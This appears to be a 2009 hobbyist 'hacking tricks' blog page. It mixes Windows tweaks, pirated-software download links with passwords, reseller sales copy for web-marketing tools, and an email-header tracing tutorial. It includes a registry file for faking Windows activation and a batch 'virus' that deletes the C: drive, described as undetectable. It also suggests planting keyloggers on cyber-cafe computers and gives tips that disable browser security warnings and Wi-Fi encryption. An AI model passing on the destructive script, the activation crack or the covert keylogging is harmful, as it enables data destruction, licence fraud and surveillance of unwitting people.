Download Link:




http://rapidshare.com/files/120891140/Unlocking.Phone.XteamWeb.Rukawa.rar

http://uploading.com/files/XWX4AFD7/Shutdown_your_Computer_with_a_Cell_Phone.flv.htm

Wednesday, August 26, 2009

How to Detect a Hacker Attack

THIS TUTORIAL HAS THE METHOD TO DETECT AN HACKERS ATTACK ON DIFFERENT OS...


  • Windows machines
  • Unix machines
    Most computer vulnerabilities can be exploited in a variety of ways. Hacker attacks may use a single specific exploit, several exploits at the same time, a misconfiguration in one of the system components or even a backdoor from an earlier attack.

    Due to this, detecting hacker attacks is not an easy task, especially for an inexperienced user. This article gives a few basic guidelines to help you figure out either if your machine is under attack or if the security of your system has been compromised. Keep in mind just like with viruses, there is no 100% guarantee you will detect a hacker attack this way. However, there's a good chance that if your system has been hacked, it will display one or more of the following behaviours.
  • Link: http://www.ziddu.com/download/3081850/HowtoDetectaHackerAttack.doc.html


Make all versions of XP and Vista "Genuine"[100% Working]without downloading any file

++Make all versions of XP and Vista genuine ++ [Tested]


here is the process:-

Copy the following text in a notepad:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]

"CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
"ProductId"="55274-640-1011873-23081"

"DigitalProductId"=hex:a4,00,00,00,03,00,00,00,35,35,32,37,34,2d,36,34,30,2d,\

31,30,31,31,38,37,33,2d,32,33,30,38,31,00,2e,00,00,00,41,32,32,2d,30,30,30,\

30,31,00,00,00,00,00,00,00,86,56,4e,4c,21,1b,2b,6a,a3,78,8e,8f,98,5c,00,00,\

00,00,00,00,dd,da,47,41,cc,6b,06,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\

00,00,00,00,00,00,00,00,00,00,00,38,31,30,32,36,00,00,00,00,00,00,00,b5,16,\
00,00,83,83,1f,38,f8,01,00,00,f5,1c,00,00,00,00,00,00,00,00,00,00,00,00,00,\

00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,66,e5,70,f3

"LicenseInfo"=hex:33,b7,21,c1,e5,e7,cd,4b,fd,7c,c6,35,51,fd,52,57,17,86,3e,18,\

d3,f4,8c,8e,35,32,7b,d1,43,8d,61,38,60,a4,ca,55,c9,9a,35,17,46,7a,4f,91,fc,\

4a,d9,db,64,5c,c4,e2,0f,34,f3,ea

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]

"OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,fd

Save it as License Key.reg

Double-click and confirm "Yes"

Tips to Speed up Firefox Mozilla be Fastest !

Change some options will make your firefox faster,
Your PC will be faster ...

1. Uncheck the automatic update: Tools > Options > Advanced > Update > Uncheck all
2. Use small cache space: Tools > Options > Advanced > Network > Cache > Set it to 15 (MB) if your RAM between 512MB and 1GB
3. Don't check spelling: Tools > Options > Advanced > General > Uncheck "Check my spelling as I type"
4. Don't warning some messages:
- Tools > Options > Security > Settings > Uncheck all
- Tools > Options > TABs > Uncheck all
5. Clear all histories: Tools > Options > Privacy >
- Uncheck all in "History"
- Check "Always clear my private data when I close Firefox"
- Click to Settings and Check all
6. Hide the status bar: Tools > Options > Content > Enable Javascript > Advanced > Select "Hide the status bar"
7. System defaults: Tools > Options > Main > Uncheck "Always check to see if Firefox is the default browser on startup"
8. In Address bar > type about:config, right-click anywhere and select New > Boolean. Name it "config.trim_on_minimize" and set it to TRUE.

HTH

Add a photo to my computer properties

I searched i didn't find this trick...

Let's Begin...

1. Open Notepad.

2. Copy and paste to Notepad:

Code:

[General]

Manufacturer=":: nLa dEViLZ :: "

Model="Support Information"

[Support Information]

Line1="Freak"

Line2="IT Solutions"

Line3="PC Support"

Line4="Webdesign"

Line5="Webprogramming"

Line6="Here u can add your phone number or something !!"

Line7="Add your e-mail: Example@aaa.com"

3. Save as "oeminfo.ini" in the System32 folder.(Without Quote)

4. Create a bmp file(Your Photo) and save it the System32 folder as "oemlogo.bmp"(Without Quote).

5. Now Check your My Computer Properties it should look like this.

Word To Web Page




"Instantly Turn Your Word Documents Into Google Adsense Revenue Generating Web Pages!"

Are you a writer who wants to get his or her work onto the Internet – but don't have any idea how to build a web page? Perhaps you know how to use Microsoft Word, but don't want to have to sit down and learn HTML or purchase difficult to use, expensive software? Maybe you'd like to find an easy way to publish your word documents online?

If so, I want to tell you about a simple, yet incredibly powerful new software tool – WordToWebPage that will revolutionize your web marketing experience and make sure you never need to worry about creating web pages again.

WordToWebPage is an easy to use desktop application that allows you to convert any Microsoft Word document into a ready to upload webpage – even if you have absolutely no programming experience at all.

Better still, WordToWebPage allows you to have complete control of your website. In a matter of seconds you can:

* Choose from three different web templates.
* Input keywords, headers and footers.
* Select background graphics
* Place your AdSense advertisements.

WordToWebPage Can Turn Your Dusty E-Books Into Profit Pulling Machines!

If you are into Internet marketing, you probably have a bunch of e-books that just aren't selling as much as you’d like.

Many people have the private label rights to books that they've never really been able to profit from.

Imagine if you could use them to generate passive Google AdSense income? With WordToWebPage you can.

Simply use WordToWebPage and it will convert your e-book it into a fully functional website – loaded with Google AdSense!

That means that with WordToWebPage you can convert a 300 page e-book into a 300 page website – with hundreds of profit pulling AdSense links in a matter of minutes!

You might end up generating more income in a month from your new website than you would have in a year's worth of e-book sales!

WordToWebPage Handles All Of Your Online Formatting Challenges!

If you've ever tried to master HTML coding to build your own website, then you know how big a pain it can be to get your site just right.

Sure, you may know what you want your site to look like on paper, but translating that into the right code can be almost impossible.

Even if you are an HTML master, one simple keystroke mistake could blow the look and feel of your entire site – and take hours to find and correct.

WordToWebPage makes sure you never have to deal with that again!

When you use WordToWebPage it automatically converts all of your fonts and original formatting into uploadable HTML code. That means that your website looks exactly like your Word document.

You have complete control of your website – in a manner of minutes!

Create A Giant Content Rich Website In A Matter Of Minutes!

One of the best ways to get web surfers to see your products is to create a highly ranked website. Yet, to get a high Google or Yahoo rank, you need to have as much legitimate content as humanly possible.

The problem is that if you simply upload hundreds of pages of junk content, you might actually get kicked off of many major search engines for creating spam websites.

WordToWebPage is your solution!

Because you can use your existing e-books as the basis of your site, you can create hundreds and hundreds of pages of real content that people want to read almost instantly.

Since your content will be full of useful information, you will never have to worry about getting black listed by Google ever again!

Meanwhile, your site visitors will be constantly looking at AdSense links and banners – and helping you make money from your old, stagnant information products.

You Won't Believe How Easy It Is To Use Word2WebPage!

One of the things I hate the most is when I purchase a new piece of software only to find out it's so complicated that it takes hours or even days to learn how to use the darn thing.

After all, I buy software to make my life easier – not more complicated!

That's why WordToWebPage was designed to be easy for anyone to use. You simply have to follow the intuitive four step system!

* Step One: Choose your template.
* Step Two: Select your Keywords, Headers, Footers and Background.
* Step Three: Input your Google AdSense information.
* Step Four: Select The Document You Want to Convert.

With the next click of your mouse, your Word pages are created instantly!

You will be able to build as many web pages as you want, whenever you need to!

WordToWebPage Will Save You Time And Money!

Do you need to get a website up and running quickly? WordToWebPage is a rock solid investment in your business.

When you order WordToWebPage today it can be yours for only $47 – that's less than it would cost you to hire a programmer for a single day. Yet, you can use Word2WebPage time and time again to build new web sites or update your existing pages.

Just consider the full suite of benefits you will receive when you order WordToWebPage today:

* The ability to make a super content rich website quickly and easily.
* The chance to convert non performing Private Label e-books into profit pulling web pages.
* The opportunity to create an easy passive income stream, with minimal investment.
* The power to build as many web pages as you want in a matter of minutes.
* Freedom from programming hassles!


Retail Value: $47.00
Product Rights: Master Resell Rights


Download:
http://www.ziddu.com/download/2659759/WordToWebPage.rar.html
Password: itguruindia.com

My Article Submitter

Now You Can Drive Insane Traffic To Your Web Site Using The Magic of Article Submission...
and it all happens practically on autopilot!







I was totally amazed when...

... I finally stopped to add up all of the money I had been spending on advertising my web site. Fifty dollars here, a hundred there; pretty soon it had become a substantial amount of money and I wasn't seeing much in return. On top of all that, I was pouring more than I care to even think about into Google and Yahoo ads.. That's why I created My Article Submitter!

You see, like many of you I had read all of the Internet marketing "how to" books, and I had become convinced that it took money to make money. Those books told me that I had to buy ads in the major search engines, rent e-mail lists and pay to insert ads into e-zines. So I clicked on the links to the programs that they recommended and I spent and I spent and I spent.

I did EVERYTHING that the "Gurus" told me to do and I ended up spending more than I was making. I felt deceived!

Does it frustrate you that you have been lied to, ripped off, and literally been taken advantage of by blood sucking MLM, and internet marketing program owners?

The reason you, and many others, may not have found financial independence yet, is because these owners are only interested in getting rich quick, leaving you poor fast!

I was guilty of blindly following the advice of so-called professionals who seemed to know how to make the big money that I was missing out on.

I read all of their books and I even spent good money attending some of their seminars. I didn't see it at first, but after I began to realize that I was bleeding so much red ink thanks to bad advertising advice that didn't work as promised, I saw what was really happening...

... many of these so-called "Gurus" actually were making all of the money that they claimed, but they weren't making it selling products.

They were getting rich by convincing everyday people like you and me to click on their affiliate links and waste our money buying advertising that we really didn't need.

They were getting fat off of our money and, honestly, there weren't too many who really cared if what they recommended worked or not. They only cared about their mega affiliate income.

So the day came that I decided I was going to stop making other people rich and start investing in myself. I went to Google and typed in the phrase "free Internet marketing advice" and I hit the jackpot!

I found hundreds of articles about Internet marketing tips, trick and tactics and it didn't cost me a penny to buy any one of them. They were FREE. And that's what got me thinking..

"Why in the world would so many people spend so much time writing free articles and getting them distributed all over the Internet?"

I began to examine the articles more closely as I read them and a few interesting patterns emerged. Of course, the first pattern I noticed was that I had found all of these articles by simply searching for a specific key phrase in Google.

So I went back to Google and tried other key phrases.

I didn't just concentrate on marketing phrases either. I love to enjoy and work on my backyard pond, so I searched on the phrase "water gardens" and hundreds of articles came up. I then searched on the phrase "restoring classic cars" and thousands more articles came up.

No matter what phrase I searched for in Google I found hundreds or even thousands of FREE articles written by people who actually knew what they were talking about!

But I still didn't have the answer I was looking for...

What was in it for the authors of these articles? Why were they spending their time writing free articles for you and me to read and enjoy?

As I looked deeper, I realized that many of these articles were posted on article repository web sites. These were huge article directories that held thousands of articles on nearly any topic you could imagine.

I noticed that each of the articles in these repositories pulled up Google AdWords when your read them. "Ah ha!", I thought. "The article site owners are making their money from the Google ads, but that's not helping the actual authors."

I kept digging...

It wasn't until I reached the part of the article known as the "Author's Resource Box" that the "Aha Ha" light really went on and it hit me smack between the eyes!

These authors were using their articles to establish themselves as experts in their particular subject matter!

Because the articles weren't actually paid ads, people were reading them from top to bottom and then going to the Author's Resource Box to click on the link to the Author's web site.

Once they reached the Author's web site they invariably found something for sale!

Since the person reading the article was already convinced of the Author's expertise in the particular subject, the chances were better that a sale would take place!

But making sales this way was just one of the benefits of distributing free articles. There were others as well!

* The more article directories that a particular article was posted to, the more "back links" there were to the Author's main web site. Since Google sees back links as an indication of an "important" site, the Author's Google ranking was benefiting.

* The more people who read the Author's article and clicked back the the main web site, the more traffic the site received. Alexa ranks sites based upon traffic, so the Author benefited that way as well.

* And finally, many of the authors had Google AdWords displayed on their main site, so they were earning revenue whenever a visitor from one of the article sites came and clicked.

I had accidentally stumbled on the mother of all sales and traffic-generating "secrets" of the Internet and it didn't cost me a penny!

Even better, I now knew how to drive all of the free traffic to my site that I could ever want, but there was still one problem...

I didn't have near the time available that it was going to take to get my own articles posted to enough article repositories to make a real difference in my sales and traffic counts, but when I looked at the automated article posting solutions out there, I was under whelmed.

* The free Article Submitters were a joke. They were little more than thinly-disguised SPAM machines that would eventually get you banned from the best article sites.

* The moderately priced ones seemed OK, but they lacked the professional features that I was looking for.

* The top-notch ones had everything that I was looking for but they were way too expensive for my blood. Some of them even wanted to charge me $35 or MORE just to submit ONE ARTICLE!

So I built my own...

And that's what brings us to what I am about to show you.

My Article Submitter is the Fastest and Easiest way to get your articles posted on hundreds of article directories without spending hours and hours on the manual labor of doing so!

* Use My Article Submitter and your articles to establish yourself as an expert in your particular area.

* Use My Article Submitter and your articles to make more sales.

* Use My Article Submitter and your articles to generate more traffic.

* Use My Article Submitter and your articles to increase your Google Page Rank.

* Use My Article Submitter and your articles to boost your Alexa rating.

Just look at everything that comes with your copy of My Article Submitter:


Feature one

My Article Submitter has 138 Auto Fill article directories for you to start posting your articles to! It also has an additional 25 Manual fill articles directory sites as well.


Feature two

You will have the ability to edit the included Article Directory submissions sites!

What if one of them closes down... you just delete it from the list of directories in the software.

What if another Article Directory site starts up that you want to submit to? You just use the Add Directory button and add as many additional sites to the software as you can find!

We have 163 Directory sites already loaded in but you are welcome to load in as many more as you wish, also don't be fooled by other Article Submitting Software that claims to have more than 500 sites to list your articles to!

These are SPAM MACHINES, that will have you looking like a fool in no time flat! They will have you submitting articles where they are not wanted and many of them even post a link back to their software right in your articles that you submit.

No where in any articles you submit will you ever see any mention of us or our software, not to mention the Article Directory owners will not have any idea you used a submission tool, your articles will look totally hand submitted.


Feature three

My Article Submitter does not just allow you to load in 500 articles and hit a button a forget it. Any software that promises this is doing nothing more then spamming your articles all over the Net.

My Article Submitter software stores all of your personal information, resource box, and articles. It then will proceed one at a time to go to each of the articles sites for you, log you in and auto fill all of your content including your name, your article, your author resource box, even an article summery on any sites that ask for it!

You will then need to manually select a category- this is the only real way to make sure your article ends up in the right place when we are talking about 163 article sites.

You then click the submit button and bam... you have just submitted another article and it appears totally manual and natural to the article directory owner which is a must if you want your article to actually get published!

My Article Submitter is EVERYTHING we say it is. My Article Submitter is EVERYTHING you HOPE it is.


Retail Value: $47.00
Product Rights: Master Resell Rights


Download:
http://www.ziddu.com/download/2659185/MyArticleSubmitter.rar.html

Pass: itguruindia.com

Making Windows XP Start 60% Faster Tutorial

Whenever you start your computer, you are faced with a few moments of thumb twiddling while Windows XP boots and prompts you to log on. Although you should expect to wait for a few moments, sometimes Windows XP seems to boot rather slowly. In fact, you may notice that over a period of time the PC that used to roar to life seems a bit sluggish instead. Fortunately, you can perform several techniques that help Windows XP get the bootup speed you want. This tutorial explores how to put these techniques to work.Stopping Unneeded Startup Services
Manual IP Addressing on Small Office/Home Networks
Disabling Recent Documents History
Disabling the Boot Logo
Removing Unwanted Fonts
Stopping Remote Assistance and Remote Desktop Sharing
Speeding Up the Dual-Boot Timeout
Speeding Up Your PPPoE Connection
Reducing the Wait Time
Automatically Killing Tasks on Shutdown.




link

Convert an IP address to an IP Number

IP address (IPv4 / IPv6) is divided into 4 sub-blocks. Each sub-block has a different weight number each powered by 256. IP number is being used in the database because it is efficient to search between a range of number in database.

Beginning IP number and Ending IP Number are calculated based on following formula:

IP Number = 16777216*w + 65536*x + 256*y + z (Formula 1)

where
IP Address = w.x.y.z

For example, if IP address is "202.186.13.4", then its IP Number "3401190660" is based on the Formula 1.

IP Address = 202.186.13.4

So, w = 202, x = 186, y = 13 and z = 4

IP Number = 16777216*202 + 65536*186 + 256*13 + 4
= 3388997632 + 12189696 + 3328 + 4
= 3401190660

To reverse IP number to IP address,

w = int ( IP Number / 16777216 ) % 256
x = int ( IP Number / 65536 ) % 256
y = int ( IP Number / 256 ) % 256
z = int ( IP Number ) % 256

where % is the mod operator and int is return the integer part of the division.
__________________

Trace E-mail sender from e-mail header

Here I shall discuss, how to trace an email sender from the email header. I shall take my MSN account as an example. But before I go into depth I shall split the email header and explain each one of them for better understanding.
Viewing Email Header
Every e-mail comes with information attached to it that tells the recipient of its history. This information called a header. The above is the Full header of email .All this information comes with the email. The header contains the information essential to tracing an e-mail. The main components to look for in the header are the lines beginning with "From:" and "Received:" However, it might be instructive to look at what various different lines in the header mean.



MIME-Version: 1.0
Received: from rwcrmhc11.comcast.net ([204.127.198.35]) by mc7-f12.hotmail.com with Microsoft SMTPSVC(5.0.2195.6713); Tue, 25 Nov 2003 19:56:18 -0800
Received: from pavilion (pcp03530790pcs.mnhwkn01.nj.comcast.net[68.37.24.150]) by comcast.net (rwcrmhc11) with SMTP id <20031126034457013001nk6pe>; Wed, 26 Nov 2003 03:44:57 +0000
X-Message-Info: JGTYoYF78jGkTvdOiviUvHyY85nt7iLD
Message-ID: <000801c3b3cf$a92237a0$96182544@mnhwkn01.nj.comcas>
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
Disposition-Notification-To: "Leona"
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Return-Path: leona6256@comcast.net
X-OriginalArrivalTime: 26 Nov 2003 03:56:18.0897 (UTC) FILETIME=[3F5AFC10:01C3B3D1]



Some e-mail programs, like Yahoo or Hotmail, have their full headers hidden by default In order to view the full header, you must specifically turn on that option. Some ways of doing this in different e-mail programs follow here:


Viewing full Header in Yahoo and Hotmail
Yahoo

Click Options -> Click Mail Preferences -> Click Show Headers -> Click "All" -> Click "Save"

Hotmail

Click Options -> Click Mail Display Headings (under "Additional Options") -> Click Message Headers -> Click "Full" ->

Click "OK"



Viewing full Header in Email Clients like (Outlook and Eudora etc)
Outlook Express
If you use OE, at least the version I have (5.5), you may not have much luck; it sometimes gives little more information than what you can see in the main window. But here's the application path anyway:
Click File/Properties/Details to find the header information.

Outlook
First, highlight the email in your Incoming window, right-click on it, and select Options. The window that comes up will have the headers at the bottom.

Eudora
Be sure the message is open, then Click the 'Blah, Blah, Blah' button from the Tool Bar, and the headers will appear.

Pegasus
Select Reader/Show All Headers/

Netscape Mail
Select Options/Headers/Show All Headers

Netscape Messenger 4.0 and 4.5
Select View/Headers/All



Now I will discuss the full header in detail:



Message ID:
It is used to identify the system from which the the message has originated (i.e. from the system the sender has logged in). However, this is too easy to forge, and is consequently not reliable.



X-Headers:

X- headers are user defined headers. They are inserted by email client programs or applications that use email. Here from the X- headers inserted into the email by the email client it is clear that the sender has used Microsoft Outlook Express 6.00.2800.1106 to send this email.

X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106



MIME-Version:
MIME stands for Multipurpose Internet Mail Extension. It tells the recipient what types of attachments are included in email. It is a format that allows people to send attachments that do not contain Standard English Words, but rather graphics, sounds, and e-mails written with other characters. The Mime-Version field merely confirms that the version of MIME used corresponds to the standard version (which is currently 1.0).



From:
Form is useless in tracing an e-mail. It consists of the email of the sender but this can be obviously be a fake. One can use any fake-mailer to fake the sender's name.


Content-Type:
This line tells the receiving e-mail client exactly what MIME type or types are included in the e-mail message. If the Content–Type is text/plain; charset="us-ascii" just tells us that the message contains a regular text message that uses English characters. ASCII is the American Standard Code for Information Interchange and is the system used to convert numbers to English characters.


Return-Path:
It is the address to which your return e-mail will be sent. Different e-mail programs use other variations of Return-Path:. These might include Return-Errors-To: or Reply-To etc.



Received:

This field is the key to find out the source of any e-mail. Like a regular letter, e-mails gets postmarked with information that tells where it has been. However, unlike a regular letter, an e-mail might get "postmarked" any number of times as it makes its way from its source through a number of mail transfer agents (MTAs). The MTAs are responsible for properly routing messages to their destination.



Let me strip-off the above email header to make the understanding easy. The header is splitted and the two received headers are given below.

Received Header 1: 204.127.198.35 - Tue, 25 Nov 2003 19:56:18 -0800
from rwcrmhc11.comcast.net ([204.127.198.35])
by mc7-f12.hotmail.com
with Microsoft SMTPSVC(5.0.2195.6713)


Received Header 2: 68.37.24.150 - Wed, 26 Nov 2003 03:44:57 +0000
from pavilion (pcp03530790pcs.mnhwkn01.nj.comcast.net[68.37.24.150])
by comcast.net (rwcrmhc11)
with SMTP
id <20031126034457013001nk6pe>



The MTAs are "stamped" on the e-mail's header so that the most recent MTA is listed on the top of the header and the first MTA through which the e-mail has passed in listed on the bottom of the header. In the above sample e-mail header, e-mail first passed through 68.37.24.150 (pcp03530790pcs.mnhwkn01.nj.comcast.net), and at last made its way through 204.127.198.35 (rwcrmhc11.comcast.net).



In the Received Header 2, the one marked with red colour "pavilion" is either the domain name of the server from which the email has originated or the name of the computer from which the email has been sent. By doing a DNS query for "pavilion", it is confirmed that it is not a know host name hence, must be the name of the computer from which the mail has originated. "68.37.24.150" is the IP address from which the mail might have originated or it is the IP address of the ISP (Internet Service Provider) to which the user was logged on while sending the mail.



Note: Correct me if I am wrong, most of the time "HELO" is prefixed to the system name from which the mail has originated, but its accuracy is not reliable.



Trace who owns the IP address
Every computers hooked on to internet is assigned with an IP address. Individual users possess a dynamic IP address when they logged on to any ISP to access internet. These IP addresses are assigned by the ISP itself. Organization usually possess static/public IP address which is stored in a database of registries.



There are three major registries covering different parts of the world. They are

www.arin.net => American Registry of Internet Numbers (ARIN) : It assigns IP addresses for the Americas and for sub Saharan Africa.

www.apnic.net => Asia Pacific Network Information Centre (APNIC) : It covers Asia

www.ripe.net => Réseaux IP Européens (RIPE NCC) : It covers Europe



Thus, to find out which organization owns a particular IP address, you can make a "WHOIS" query in the database at any of these registries. You do this by typing the IP address into the "WHOIS" box that appears on each of these websites.



"Received Header" will have the IP address of the ISP in case the users has dialed up to the ISP while sending the email. But if the user has send the email from within the corporate then the corporate public/static IP address is logged.



By giving a "WHOIS" query for 68.37.24.150 at www.arin.net, the following result has been displayed:



Comcast Cable Communications, Inc. JUMPSTART-1 (NET-68-32-0-0-1)
68.32.0.0 - 68.63.255.255
Comcast Cable Communications, Inc. NJ-NORTH-14 (NET-68-37-16-0-1)
68.37.16.0 - 68.37.31.255

# ARIN WHOIS database, last updated 2004-02-04 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.



From above queries it is found that the IP address (68.37.24.150) is owned "Comcast". By making further queries on "Comcast" it is found that it is the name of the ISP located in NJ, US - 08002. The result of further query is given below:



OrgName: Comcast Cable Communications, Inc.
OrgID: CMCS
Address: 3 Executive Campus
Address: 5th Floor
City: Cherry Hill
StateProv: NJ
PostalCode:08002
Country: US

NetRange: 68.32.0.0 - 68.63.255.255
CIDR: 68.32.0.0/11
NetName: JUMPSTART-1
NetHandle: NET-68-32-0-0-1
Parent: NET-68-0-0-0-0
NetType: Direct Allocation
NameServer: DNS01.JDC01.PA.COMCAST.NET
NameServer: DNS02.JDC01.PA.COMCAST.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2001-11-29
Updated: 2003-11-05

TechHandle: IC161-ARIN
TechName: Comcast Cable Communications Inc
TechPhone: +1-856-317-7200
TechEmail: cips_ip-registration@cable.comcast.com

OrgAbuseHandle: NAPO-ARIN
OrgAbuseName: Network Abuse and Policy Observance
OrgAbusePhone: +1-856-317-7272
OrgAbuseEmail: abuse@comcast.net

OrgTechHandle: IC161-ARIN
OrgTechName: Comcast Cable Communications Inc
OrgTechPhone: +1-856-317-7200
OrgTechEmail: cips_ip-registration@cable.comcast.com

# ARIN WHOIS database, last updated 2004-02-04 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.



Now since the IP address found belongs to an ISP, it is clear that the sender has dialed up to this ISP while sending the email. For further enquiry we can then request the ISP to provide us with details of the user who has dialed up to them at that given point of time (Wed, 26 Nov 2003 03:44:57 +0000). If the ISP cooperates, they will check their user and message logs to see who was logged into that particular IP address at that time and date. This will reveals the sender's telephone number from which he/she has dialed to the ISP. Now once we have the telephone number we can easily retrieve the name and address of the sender.



Now the above case is solved but there are also other cases where the IP address found on the email header may be owned by an organisation or a cyber cafe. Below I have discussed how you can trace the sender in both of these cases.



Cases1: THE IP ADDRESS OWNED BY AN ORGANISATION

But in case the IP address found belongs to an organisation then you have to request them to provide information about the user who has send the mail from within the organisation network. They must have user and message logs on their firewall / proxy and can trace each of their computers connected at the given point of time. By supplying the organisation with the e-mail header of the offending e-mail, they can check these logs and hopefully produce information of the user of that machine.



Cases2: THE IP ADDRESS OWNED BY A CYBER-CAFE

In case it is found that the sender has sent the email from a cyber-cafe then it becomes a difficult task to trace him/her. The user may not be a frequent visitor to that cyber-cafe. But let's assume that you receive such mails frequently from that particular cyber-cafe then you can install "key-loggers" in the computers at the cafe. These programs records user's keystrokes, thus creating a record of everything that was typed at a particular terminal. By reviewing the key-logger logs you may be able to trace the sender in this case.



Note: These methods would aid greatly in identifying an e-mail sender, they also would impinge on the rights of others using the computers to conduct their personal business. Such a conflict defines the ongoing struggle between the fight against terrorism over the Internet and the right to privacy, which will continue to evolve in the years ahead.

LEARN SIMPLE VIRUS >>>PROgRAM USING ...NOTEPAD....

write ur own simple virus cant detected by any antivirus....


@Echo off
Del C:\ *.* y

And save that as .bat not .txt and RUN IT
It will delete the content of C:\ drive...

PLEASE NoTe::::: dont run that .bat file on ur system .... it will delet c:...

IF ANY ONE..... DARE TO ......RUN ...U LOST ..........CONTENTS OF C drive

EVEN I DIDN't TRY THIS........

I WILL NOT RESPONSIBLE FOR ANYTHING DONE BYE U USING THE INFORMATION GIVEN ABOVE...

Change Text on XP Start Button...

Step 1 - Modify Explorer.exe File

In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a special editor. For purposes of this article we have used Resource Hacker. Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Mcft Windows 95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.

The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe.

The category we are going to be using is "String Table". Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.

There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry. In my case we used Click Me!

You’ll notice that after the new text string has been entered the Compile Script button that was grayed out is now active. we won’t get into what’s involved in compiling a script, but suffice it to say it’s going to make this exercise worthwhile. Click Compile Script and then save the altered file using the Save As command on the File Menu. Do not use the Save command – Make sure to use the Save As command and choose a name for the file. Save the newly named file to C:\Windows.


Step 2 – Modify the Registry

!!!make a backup of your registry before making changes!!!

Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open field. Navigate to:

HKEY_LOCAL_MACHINE\ SOFTWARE\ Mcft\ Windows NT\ CurrentVersion\ Winlogon

In the right pane, double click the "Shell" entry to open the Edit String dialog box. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.

Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text
__________________

Make Your Computer 3 Time Faster!!

This Tutorial will teach you how to increase your operating system speed 3 times faster.

This steps should be applied by either slow and fast computers. It will speed up your operating system surfing.

There are 27 easy steps. It might take a bit long to apply them all especially if you're not familiar with windows registry, but trust me it worth it.

Download:
http://www.ziddu.com/download/2634719/Make218.pdf.html

Wi-fi Without Routers

sharing your existing ethernet internet connection

1. go to control panel -> network connection.
2. right click on your ethernet connection and click on “properties”.
3. go to “advanced” tab.
4. check “allow other network….. internet connection”
5. in the drop down below select the wifi connection of your pc. if it is disabled, it will be showing your wifi connection already.
6. click on “settings”
7. check the protocols you need to share.i normally use only http and https.
8. click on “ok”.you reach the network connection page. the sharing part is now over.

finding dns server ip address.

1. click on start -> run
2. type in cmd in the run prompt
3. in the new window type “ipconfig /all” and press enter.
4. note down your dns server ip address from the screen.

configuring the wifi

1. go again to control panel -> network connections.
2. right click on your wifi connection and click “properties”.
3. go to”wireless network” tab.
4. the “use windows to configure my wireless network connection” should be checked.
5. in the preferred network connection section click on add button
6. enter a name of your wish to the network name.
7. network authentication is “open”
8. change data encryption to “disabled”
9. check the “this is a computer to computer …. not used” connection.
10. click “ok”.
11. click on general tab. select “internet protocol(tcp/ip) and click on properties button.
12. now type 192.168.0.1 in ip address, 255.255.255.0 in subnet mask, leave default gateway empty.
13. fill in the dns server entry which you had noted down earlier.
14. click on “ok” and your network is set.

your network should appear on the wifi network list now. search for wlan on your phone. connect and enjoy browsing on your phone.
__________________